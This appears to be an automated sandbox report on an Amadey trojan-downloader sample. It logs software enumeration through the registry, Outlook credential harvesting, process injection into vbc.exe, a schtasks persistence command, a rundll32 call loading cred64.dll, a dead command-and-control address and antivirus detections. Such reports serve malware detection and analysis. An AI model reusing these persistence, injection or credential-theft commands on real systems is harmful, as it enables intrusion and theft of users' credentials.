RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:46 p.m.	key_handle: 0x000001f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:46 p.m.	key_handle: 0x000001f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:46 p.m.	key_handle: 0x000001f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:46 p.m.	key_handle: 0x000001f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:46 p.m.	key_handle: 0x000001f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:46 p.m.	key_handle: 0x000001f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:46 p.m.	key_handle: 0x000001f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:46 p.m.	key_handle: 0x000001f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:46 p.m.	key_handle: 0x000001f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:46 p.m.	key_handle: 0x000001f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:46 p.m.	key_handle: 0x000001f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:46 p.m.	key_handle: 0x000001f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1

Harvests credentials from local email clients (1 event)

registry

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2348 called NtSetContextThread to modify thread in remote process 2412
NtSetContextThread Dec. 7, 2022, 3:45 p.m.	registers.eip: 2005598660 registers.esp: 3407608 registers.edi: 0 registers.eax: 4287662 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000020 process_identifier: 2412	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2348 resumed a thread in remote process 2412
Process injection	Process 2132 resumed a thread in remote process 2296
NtResumeThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x00000020 suspend_count: 1 process_identifier: 2412	1	0	0
NtResumeThread Dec. 7, 2022, 3:46 p.m.	thread_handle: 0x000002a8 suspend_count: 1 process_identifier: 2296	1	0	0

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

31.41.244.14:4683

Executed a process and injected code into it, probably while unpacking (50 out of 60 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Dec. 7, 2022, 3:45 p.m.	thread_identifier: 2140 thread_handle: 0x00000278 process_identifier: 2136 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000280	1	1
NtResumeThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x00000244 suspend_count: 1 process_identifier: 2136	1	0
CreateProcessInternalW Dec. 7, 2022, 3:45 p.m.	thread_identifier: 2220 thread_handle: 0x00000268 process_identifier: 2216 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000270	1	1
CreateProcessInternalW Dec. 7, 2022, 3:45 p.m.	thread_identifier: 2352 thread_handle: 0x0000040c process_identifier: 2348 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000033001\5jk29l2fg.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000033001\5jk29l2fg.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000033001\5jk29l2fg.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000428	1	1
CreateProcessInternalW Dec. 7, 2022, 3:45 p.m.	thread_identifier: 3048 thread_handle: 0x00000470 process_identifier: 3044 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000041001\wish.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000041001\wish.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000041001\wish.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000490	1	1
CreateProcessInternalW Dec. 7, 2022, 3:46 p.m.	thread_identifier: 2052 thread_handle: 0x00000468 process_identifier: 2132 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000042001\linda5.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000042001\linda5.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000042001\linda5.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000048c	1	1
CreateProcessInternalW Dec. 7, 2022, 3:46 p.m.	thread_identifier: 2408 thread_handle: 0x00000460 process_identifier: 2392 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000043001\anon.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000043001\anon.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000043001\anon.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000494	1	1
CreateProcessInternalW Dec. 7, 2022, 3:46 p.m.	thread_identifier: 2560 thread_handle: 0x000004a8 process_identifier: 2556 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000050001\pb1109.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000050001\pb1109.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000050001\pb1109.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000004ac	1	1
CreateProcessInternalW Dec. 7, 2022, 3:46 p.m.	thread_identifier: 2880 thread_handle: 0x000004b4 process_identifier: 2864 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\rundll32.exe track: 1 command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main filepath_r: C:\Windows\System32\rundll32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000004c8	1	1
CreateProcessInternalW Dec. 7, 2022, 3:45 p.m.	thread_identifier: 2416 thread_handle: 0x00000020 process_identifier: 2412 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000002c	1	1
NtGetContextThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x00000020	1	0
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 221184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	1	0
WriteProcessMemory Dec. 7, 2022, 3:45 p.m.	buffer: base_address: 0x00400000 process_identifier: 2412 process_handle: 0x0000002c	1	1
WriteProcessMemory Dec. 7, 2022, 3:45 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2412 process_handle: 0x0000002c	1	1
NtSetContextThread Dec. 7, 2022, 3:45 p.m.	registers.eip: 2005598660 registers.esp: 3407608 registers.edi: 0 registers.eax: 4287662 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000020 process_identifier: 2412	1	0
NtResumeThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x00000020 suspend_count: 1 process_identifier: 2412	1	0
NtResumeThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2412	1	0
NtResumeThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 2412	1	0
NtResumeThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2412	1	0
NtResumeThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x00000200 suspend_count: 1 process_identifier: 2412	1	0
NtGetContextThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000e8	1	0
NtSetContextThread Dec. 7, 2022, 3:45 p.m.	registers.eip: 1928735620 registers.esp: 3404228 registers.edi: 42103756 registers.eax: 524448 registers.ebp: 3404232 registers.edx: 42092696 registers.ebx: 0 registers.esi: 5528 registers.ecx: 62062592 thread_handle: 0x000000e8 process_identifier: 2412	1	0
NtResumeThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2412	1	0
NtGetContextThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000e8	1	0
NtSetContextThread Dec. 7, 2022, 3:45 p.m.	registers.eip: 1928735620 registers.esp: 3404176 registers.edi: 60817408 registers.eax: 89522688 registers.ebp: 3404216 registers.edx: 96 registers.ebx: 0 registers.esi: 96 registers.ecx: 40466316 thread_handle: 0x000000e8 process_identifier: 2412	1	0
NtResumeThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2412	1	0
NtGetContextThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000e8	1	0
NtResumeThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2412	1	0
NtGetContextThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000e8	1	0
NtResumeThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2412	1	0
NtResumeThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 3044	1	0
NtResumeThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 3044	1	0
NtResumeThread Dec. 7, 2022, 3:45 p.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 3044	1	0
NtResumeThread Dec. 7, 2022, 3:46 p.m.	thread_handle: 0x00000268 suspend_count: 1 process_identifier: 2132	1	0
CreateProcessInternalW Dec. 7, 2022, 3:46 p.m.	thread_identifier: 2268 thread_handle: 0x000002a8 process_identifier: 2296 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\msiexec.exe track: 1 command_line: "C:\Windows\System32\msiexec.exe" -y .\XPsIE.42 filepath_r: C:\Windows\System32\msiexec.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002b0	1	1
NtResumeThread Dec. 7, 2022, 3:46 p.m.	thread_handle: 0x000002a8 suspend_count: 1 process_identifier: 2296	1	0
NtResumeThread Dec. 7, 2022, 3:46 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2392	1	0
NtResumeThread Dec. 7, 2022, 3:46 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2392	1	0
NtResumeThread Dec. 7, 2022, 3:46 p.m.	thread_handle: 0x0000024c suspend_count: 1 process_identifier: 2392	1	0
NtResumeThread Dec. 7, 2022, 3:46 p.m.	thread_handle: 0x00000364 suspend_count: 1 process_identifier: 2392	1	0
NtGetContextThread Dec. 7, 2022, 3:46 p.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread Dec. 7, 2022, 3:46 p.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread Dec. 7, 2022, 3:46 p.m.	thread_handle: 0x000000e0	1	0
NtSetContextThread Dec. 7, 2022, 3:46 p.m.	registers.eip: 1921788804 registers.esp: 1567356 registers.edi: 63442885 registers.eax: 84017664 registers.ebp: 1567396 registers.edx: 42 registers.ebx: 0 registers.esi: 42 registers.ecx: 37590748 thread_handle: 0x000000e0 process_identifier: 2392	1	0

File has been identified by 49 AntiVirus engines on VirusTotal as malicious (49 events)

MicroWorld-eScan	Gen:Variant.Lazy.158178
FireEye	Generic.mg.065ee41f9a4f66bd
ALYac	Gen:Variant.Lazy.158178
Cylance	Unsafe
VIPRE	Gen:Variant.Lazy.158178
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Riskware ( 00584baa1 )
Alibaba	TrojanDownloader:Win32/Amadey.e07e980d
K7GW	Riskware ( 00584baa1 )
Cybereason	malicious.f9a4f6
Arcabit	Trojan.Lazy.D269E2
BitDefenderTheta	Gen:NN.ZexaF.36106.puW@a4I5Xbhi
Cyren	W32/Amadey.A.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/TrojanDownloader.Amadey.A
TrendMicro-HouseCall	Trojan.Win32.AMADEY.YXCLDZ
Kaspersky	HEUR:Trojan-Downloader.Win32.Deyma.gen
BitDefender	Gen:Variant.Lazy.158178
Cynet	Malicious (score: 100)
Avast	Win32:BotX-gen [Trj]
Tencent	Win32.Trojan-Downloader.Deyma.Rsmw
Ad-Aware	Gen:Variant.Lazy.158178
Emsisoft	Gen:Variant.Lazy.158178 (B)
DrWeb	Trojan.MulDrop21.20274
TrendMicro	Trojan.Win32.AMADEY.YXCLDZ
McAfee-GW-Edition	BehavesLike.Win32.NetLoader.dh
SentinelOne	Static AI - Malicious PE
Sophos	Mal/Generic-S + Mal/Horst
APEX	Malicious
Jiangmin	TrojanDownloader.Deyma.akw
Avira	TR/Redcap.rraiy
Antiy-AVL	Trojan[Downloader]/Win32.Amadey
Kingsoft	Win32.Troj.Undef.(kcloud)
Gridinsoft	Trojan.Win32.Gen.bot
Microsoft	Trojan:Win32/Amadey.MA!MTB
GData	Gen:Variant.Lazy.158178
Google	Detected
AhnLab-V3	Malware/Win.Trojanspy.C5238800
Acronis	suspicious
McAfee	GenericRXUP-GL!065EE41F9A4F
MAX	malware (ai score=80)
Malwarebytes	Trojan.Amadey
Rising	Downloader.Amadey!8.125AC (TFE:5:CLsQ6OOtGZT)
Ikarus	Trojan-Downloader.Win32.Amadey
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Injector.EGTS!tr
AVG	Win32:BotX-gen [Trj]
Panda	Trj/GdSda.A

newlege.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All